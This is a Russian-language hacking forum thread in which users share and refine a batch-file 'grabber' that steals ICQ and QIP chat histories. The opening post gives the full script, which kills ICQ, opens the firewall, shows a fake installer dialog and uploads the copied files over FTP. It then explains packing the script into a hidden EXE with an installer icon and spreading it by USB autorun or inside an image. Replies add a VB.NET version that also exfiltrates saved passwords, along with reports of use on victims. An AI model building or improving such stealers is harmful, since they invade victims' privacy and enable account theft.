вот сделал батник тут недавно, впринципе делал ради одной жертвы, но непригодился в последующем...
был бы очень рад каким нибудь дополнениям к нему и усовершенствованиям. также интересует аспект палевности данного батника, хотел бы узнать где он может запалится и на чем если что.


@echo off
@attrib "%CD%\zip32.exe" +h +s
@attrib "%CD%\ftpserv.cmd" +h +s
@attrib "%CD%\grab.bat" +h +s
@taskkill /f /IM ICQ.exe
@netsh firewall add allowedprogram C:\windows\system32\ftp.exe ENABLE
@mkdir c:\windows\dump_rep
@echo msgbox ".................................................. ......."+chr(13)+chr(13)+"Please wait now..."+chr(13)+chr(13)+"Installing..."+chr(13)+chr(13)+".................................................. .......",4096,"The Middler! v.0.133 beta">c:\windows\alrt.vbs
@start c:\windows\alrt.vbs
@ping 1.1.1.1 -n 1 -w 10000
@copy "%APPDATA%\ICQ\*********\Messages.mdb" "c:\windows\dump_rep\dump_ICQ.bin" /y
@zip32 "C:\Program Files\QIP\Users" "c:\windows\debug\dump_QIP_new.zip"
@copy "c:\windows\debug\dump_QIP_new.zip" "c:\windows\dump_rep\dump_QIP_new.bin" /y
@del "c:\windows\debug\dump_QIP_new.zip"
@zip32 "%APPDATA%\QIP\Profiles" "c:\windows\debug\dump_QIP_old.zip"
@copy "c:\windows\debug\dump_QIP_old.zip" "c:\windows\dump_rep\dump_QIP_old.bin" /y
@del "c:\windows\debug\dump_QIP_old.zip"
@ftp -s:"%CD%/ftpserv.cmd"
@echo msgbox ".................................................. ......."+chr(13)+chr(13)+"Error 1251"+chr(13)+chr(13)+".................................................. .......",4096,"The Middler! v.0.133 beta">c:\windows\alrtt.vbs
@attrib "%CD%\zip32.exe" -h -s
@attrib "%CD%\ftpserv.cmd" -h -s
@attrib "%CD%\grab.bat" -h -s
@del "%CD%\zip32.exe"
@del "%CD%\ftpserv.cmd"
@del "%CD%\grab.bat"
@start c:\windows\alrtt.vbs


+ сервер


o tvoi.ftp.com
login
password
binary
cd dmp
send c:\windows\dump_rep\dump_ICQ.bin ICQ.bin
send c:\windows\dump_rep\dump_QIP_new.bin QIP_N.bin
send c:\windows\dump_rep\dump_QIP_old.bin QIP_O.bin
bye


упаковываем этот батник вместе с сервером с помощью Bat To Exe Converter v1.5

как?

1) как главный файл для компиляции выбираем тело граббера
2) настраиваем: Invisible Application, Temporary Directory, Delete At Exit, Overwrite Existing Files
3) на вкладке Include добавляем (Add) файлы : наш фтп сервер (допустим ftpserv.cmd) и прогу для архивации истории и папок квипа - zip32.exe
4) на вкладке Versioninformations добавляем иконку дистрибутива
5) нажимаем Compile
6) готово


как все это работает?

после запуска нашего экзешника в %temp% распакуется 3 файла - тело граббера, фтп сервачок, прога для архивации (консольная) - zip32.exe.
все эти файлы будут скрыты - как "скрытый" и "системный".
дальше убиваем процесс ICQ.ехе - иначе скопировать файлы истории аськи невозможно.
добавляем в исключения вин-файрволла прогу ftp.exe - стандартный фтп клиент для виндовозов.
создаем папку для копии нашей истории - c:\windows\dump_rep.
создаем файл на VBS - простое окно с текстом, якобы установки проги "The Middler" - уж что это за прога итд - тут зависит от вашей фантазии.
делаем паузу в 10 секунд, чтобы все операции были окончательно завершены.
копируем файл истории жертвы из ICQ в нашу папку dump_rep.
архивируем один из возможных путей истории квипа - папку C:\Program Files\QIP\Users.
перемещаем ее тоже в папку dump_rep.
пробуем тоже самое с %USERPROFILE%\Application Data\QIP\Profiles
открываем фтп сервер, который заливает на наш фтп данные файлы.
убираем аттрибуты "скрытый" и "системный" с наших файлов и удаляем их.
запускаем очередное обаманное окно при помощи VBS - мол при установке проги "The Middler" произошла ошибка 1251.

качаем:

Bat To Exe Converter v1.5 (http://www.f2ko.de/English/b2e/index.php)
zip32.exe (http://www.f2ko.de/Deutsch/cmdtools/zip32.exe)
Setup.ico (http://www.pwrshield.com/upload/filetype/Install32x32.gif)

P.S.
незаываем написать ICQ номер жертвы вот тут:
@copy "%USERPROFILE%\Application Data\ICQ\NOMER_TUT\Messages.mdb"

P.S.S.
авторан с флехи:
[autorun]
shellexecute=compiled.exe
где compiled.exe это наш скомпилированный граббер. только придется удалить "запуск установки The Middler" - чтобы вообще без палева


Тестированно на winlogon.exe

1\ %USERPROFILE%\Application Data\ = %APPDATA% --> упрощаем код, вес
2\ инфа не обязательно в %APPDATA%, может QIP ставили для всех пользователей ?) т.е. в %ALLUSERSPROFILE%\Application Data\ ;)
3\ QIP 2005 могли и не в Program Files установить + винда не обязательно на диске C, но я сам хз, как это лучше сделать, ну как минимум %ProgramFiles%\QIP\

а насчёт палевности:
допустим запускаем мы его с флэшки:

1\ авторан:
[autorun]
shellexecute=hide_console bat.bat
где hide_console прога, я думаю понятно какого назначения, найти в сети интернет не сложно)

2\дописываем в конец батника start ..

+ винда не обязательно на диске C
%windir%

%windir%
я о Program Files
+ это тоже

винда не обязательно на диске C

а кто сказал что квип или ася именно там где винда?

а кто сказал что квип или ася именно там где винда?
вот в этом то и дело :(
в этом случае вообще тока поиск по реестру поможет :(

в этом случае вообще тока поиск по реестру поможет

но как это сделат на бат?

но как это сделат на бат?
хз, я над подобным уже неделю сижу :(
реализация сложная, но видимо возможна, должно быть что-то типа:
<вывод нужной строки из reg, regedit> --> дальше по конвееру |find <нужное> --> задание это переменной --> юзаем

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Uni nstall\Qip Infium" /v installlocation - вывод директории, куда установили...

дамп создает, но на фтп не отправляет, в чем может быть дело? (специально создал файл dump_ICQ.bin в папке C:\WINDOWS\dump_rep весом 1 кб). запускаю приложение (формат .cmd) сервера в котором у меня прописано

o ftp.narod.ru
мой_логин
мой_пароль
binary
cd dmp
send c:\windows\dump_rep\dump_ICQ.bin ICQ.bin
send c:\windows\dump_rep\dump_QIP_new.bin QIP_N.bin
send c:\windows\dump_rep\dump_QIP_old.bin QIP_O.bin
bye

в чем дело? спасибо

napishi v konce tela batnika:

cmd /k

potom zapusti
uvidish gde oshibka

возможно скоро сам буду юзать ) кто юзал - все ок?

Delete

на хэкере похожую хрень выкладывали, заточенную под флешку.

на хэкере похожую хрень выкладывали, заточенную под флешку.


линк в студию

Не издевайтесь на bat - vb, delphi,C#/C++.

P.S на C# строчек 15 выйдет.

а в опере мини так можно сделать?

to est?

Не издевайтесь на bat - vb, delphi,C#/C++.

P.S на C# строчек 15 выйдет.
по возможности напиши статью,было б очень здорово..спс

может пригодиться

вот кто небудь сделал бы такую хрень, под винд XP, 7 универсальную для QIP(qip infinium) ICQ - было бы здорово !

на VB напишите кто нибудь))

отрубил ведение истории и отчистил все логи, можете меня не хекать =)

помогите,в какой programe прочитать ICQ.bin спасибо

переименуй на icq.mdb и открывай через microsoft access

А если я делал для icq 7 ? там файл называется Messages.qdb ? :)) sps

http://www.postimage.org/image.php?v=aVhjeMJ
Что делать при этой ошибки + alrt.vbs a alrtt.vbs

на VB напишите кто нибудь))
Создаем новый проект Windows Forms
Правим свойства формы
Me.ShowIcon = False
Me.FormBorderStyle = System.Windows.Forms.FormBorderStyle.SizableToolWi ndow
Me.ShowInTaskbar = False
Me.WindowState = System.Windows.Forms.FormWindowState.Minimized


Создаем функцию (копируем код ниже)

Private Function zip(ByVal filenasdasfaame As String, ByVal zipfilename As String) As Boolean
Try
filenasdasfaame = specstr(filenasdasfaame)
zipfilename = specstr(zipfilename)
Dim strZIPHeader As String
strZIPHeader = Chr(80) & Chr(75) & Chr(5) & Chr(6) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0)
Dim fso = CreateObject("Scripting.FileSystemObject")
Dim tf = fso.CreateTextFile(zipfilename)
tf.Write(strZIPHeader)
tf.Close()
With CreateObject("Shell.Application")
.NameSpace(zipfilename.ToString).CopyHere(filenasd asfaame.ToString)
End With
'(MsgBox("Обновление для Microsoft Windows готовы к установке", MsgBoxStyle.Information))
Threading.Thread.Sleep(3000)
z = 1
Catch ex As Exception
End Try
If z <> 0 Then Return True Else Return False
End Function

Private Function _prockill(ByVal procname As String) As Boolean
Try
For Each proc In Process.GetProcessesByName(procname)
proc.Kill() : z = 1
Next
If z = 1 Then Return True Else Return False
Catch ex As Exception
Return False
End Try
End Function

Private Function _findfile(ByVal parent As String, ByVal filename As String) As Boolean
Try
parent = specstr(parent)
For Each fs As IO.FileInfo In My.Computer.FileSystem.GetDirectoryInfo(parent).Ge tFiles(filename, SearchOption.AllDirectories)
zip(fs.FullName,fs.FullName & ".zip")

My.Computer.Network.UploadFile(fs.FullName & ".zip", ftp://kuda.ru" & CChar("/") & fs.Name.Replace(fs.Extension, "") & "-" & z.ToString & fs.Extension,user,pasw)
Microsoft.visualBasic.Kill(fs.FullName & ".zip")
z += 1
Next
Catch ex As Exception
End Try
If z <> 0 Then Return True Else Return False
End Function
Создаем обработчик события загрузки формы (MyBase.Load)
Пишем туда что-то примерно такое:


Dim p(10) as string
Dim it as integer = 0

For each s in My.Computer.FileSystem.Devices
if s.isReady then if new IO.DirectoryInfo(s.Root & "\Program Files\QIP").Exist then p(it)=s.Root & "\Program Files\QIP":it+=1
Next
For each s as string in p
if s<>Nothing AND s<>"" then
if My.Computer.Network.isAvailable then
for each ss as string in IO.DirectoryInfo(s & "\Users").GetDirectoryes()
zip(ss & "\History",ss & ".zip")
My.Computer.Network.UploadFile(ss & "\History & ".zip","ftp://kuda.ru",user,pasw)
My.Computer.Network.UploadFile(ss & "\config.ini","ftp://kuda.ru",user,pasw)
Microsoft.VisualBasic.Kill(ss & "\History & ".zip"")
end if
Next
end if
_prockill("ICQ")
_findfile(Environment.GetEnvironmentVariable("APPDATA") & "\ICQ","*.mdb")
_findfile(Environment.GetEnvironmentVariable("APPDATA") & "\ICQ","*.qdb")


Писал без компилятора, наверняка там будут синтаксические ошибки, но думаю вы разберетесь

Также можно всунуть в нескольких местах обработчик исключений с нулевым исключением - для того чтоб ошибка не выскочила, если вообще будет таковая

В общем попробуйте ;)

P.S Кстати приведенный код крадет не только историю, но и файлы паролей (если они сохранены)
Актуально для:
ICQ 6,
ICQ Lite
QIP 2005
Achtung!!!
Написано исключительно в образовательных целях, за практическое использование данного листинга, автор не несет ответственности!

Создаем новый проект Windows Forms
Правим свойства формы
Me.ShowIcon = False
Me.FormBorderStyle = System.Windows.Forms.FormBorderStyle.SizableToolWi ndow
Me.ShowInTaskbar = False
Me.WindowState = System.Windows.Forms.FormWindowState.Minimized


Создаем функцию (копируем код ниже)

Private Function zip(ByVal filenasdasfaame As String, ByVal zipfilename As String) As Boolean
Try
filenasdasfaame = specstr(filenasdasfaame)
zipfilename = specstr(zipfilename)
Dim strZIPHeader As String
strZIPHeader = Chr(80) & Chr(75) & Chr(5) & Chr(6) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0) & Chr(0)
Dim fso = CreateObject("Scripting.FileSystemObject")
Dim tf = fso.CreateTextFile(zipfilename)
tf.Write(strZIPHeader)
tf.Close()
With CreateObject("Shell.Application")
.NameSpace(zipfilename.ToString).CopyHere(filenasd asfaame.ToString)
End With
'(MsgBox("Обновление для Microsoft Windows готовы к установке", MsgBoxStyle.Information))
Threading.Thread.Sleep(3000)
z = 1
Catch ex As Exception
End Try
If z <> 0 Then Return True Else Return False
End Function

Private Function _prockill(ByVal procname As String) As Boolean
Try
For Each proc In Process.GetProcessesByName(procname)
proc.Kill() : z = 1
Next
If z = 1 Then Return True Else Return False
Catch ex As Exception
Return False
End Try
End Function

Private Function _findfile(ByVal parent As String, ByVal filename As String) As Boolean
Try
parent = specstr(parent)
For Each fs As IO.FileInfo In My.Computer.FileSystem.GetDirectoryInfo(parent).Ge tFiles(filename, SearchOption.AllDirectories)
zip(fs.FullName,fs.FullName & ".zip")

My.Computer.Network.UploadFile(fs.FullName & ".zip", ftp://kuda.ru" & CChar("/") & fs.Name.Replace(fs.Extension, "") & "-" & z.ToString & fs.Extension,user,pasw)
Microsoft.visualBasic.Kill(fs.FullName & ".zip")
z += 1
Next
Catch ex As Exception
End Try
If z <> 0 Then Return True Else Return False
End Function
Создаем обработчик события загрузки формы (MyBase.Load)
Пишем туда что-то примерно такое:


Dim p(10) as string
Dim it as integer = 0

For each s in My.Computer.FileSystem.Devices
if s.isReady then if new IO.DirectoryInfo(s.Root & "\Program Files\QIP").Exist then p(it)=s.Root & "\Program Files\QIP":it+=1
Next
For each s as string in p
if s<>Nothing AND s<>"" then
if My.Computer.Network.isAvailable then
for each ss as string in IO.DirectoryInfo(s & "\Users").GetDirectoryes()
zip(ss & "\History",ss & ".zip")
My.Computer.Network.UploadFile(ss & "\History & ".zip","ftp://kuda.ru",user,pasw)
My.Computer.Network.UploadFile(ss & "\config.ini","ftp://kuda.ru",user,pasw)
Microsoft.VisualBasic.Kill(ss & "\History & ".zip"")
end if
Next
end if
_prockill("ICQ")
_findfile(Environment.GetEnvironmentVariable("APPDATA") & "\ICQ","*.mdb")
_findfile(Environment.GetEnvironmentVariable("APPDATA") & "\ICQ","*.qdb")


Писал без компилятора, наверняка там будут синтаксические ошибки, но думаю вы разберетесь

Также можно всунуть в нескольких местах обработчик исключений с нулевым исключением - для того чтоб ошибка не выскочила, если вообще будет таковая

В общем попробуйте ;)

P.S Кстати приведенный код крадет не только историю, но и файлы паролей (если они сохранены)
Актуально для:
ICQ 6,
ICQ Lite
QIP 2005
Achtung!!!
Написано исключительно в образовательных целях, за практическое использование данного листинга, автор не несет ответственности!

у меня большая просьба ;) если бы ты не мог сделать видео по этому , я только начинаю усваивать программу но много чего не знаю a кокрас вот это мне очень надо спасибо если будет время

автору респект

ТС клевая статья

Народ, архивируйте базы, прежде чем их качать, иногда этот процесс может уменьшить размер баз в десятки раз...

Народ, архивируйте базы, прежде чем их качать, иногда этот процесс может уменьшить размер баз в десятки раз...

@zip32...

:)

Кто юзал ето батник прошу написать о результатах...

Кто юзал ето батник прошу написать о результатах...

я на себе тестил и на винлогоне, все гуд

протестил, все работает!) Спасибо)

Если кто-то нормально скомпилировал функцию добавления файла в zip-архив (не важно на каком языке) Компильните (!!!) и выложите плз простейшую реализацию одной лишь этой функции. Хотел когда-то написать аналог зипования средствами винь на асм, дошел до NAMESPACE.COPYHERE, все отработало на ура, только в архиве файла так и не увидел, после чего решил забить так как мозг уже кипел
P.S. Вот хотелось бы взглянуть на рабочий вариант из-под отладчика. :)

я на себе тестил и на винлогоне, все гуд
Odin vopros esli mozhno grab.exe skryt naprimer v Kartinku a pri otkrytie chtoby zapustilsia grab.exe no prito evo nebylo vidno ? kakto :) sps

просто добавь в начало батника строку

start "%CD%\kartinka.jpg"

и добавь в Include файл картинки с именем kartinka.jpg

Написать одно,а вот на видео с самого начало записать,да и понятней все будет.Может кто действительно все на видео с самого начала запишет у кого время будет?

nu zapishu esli vremya budet...

Может туда добавить пасс от ICQ Operы и Мазилы?;)

Может туда добавить пасс от ICQ Operы и Мазилы?
Можно использовать Pinch

Pinch

суровые хакерюги юзают батники. а самая элита - текстовики. :o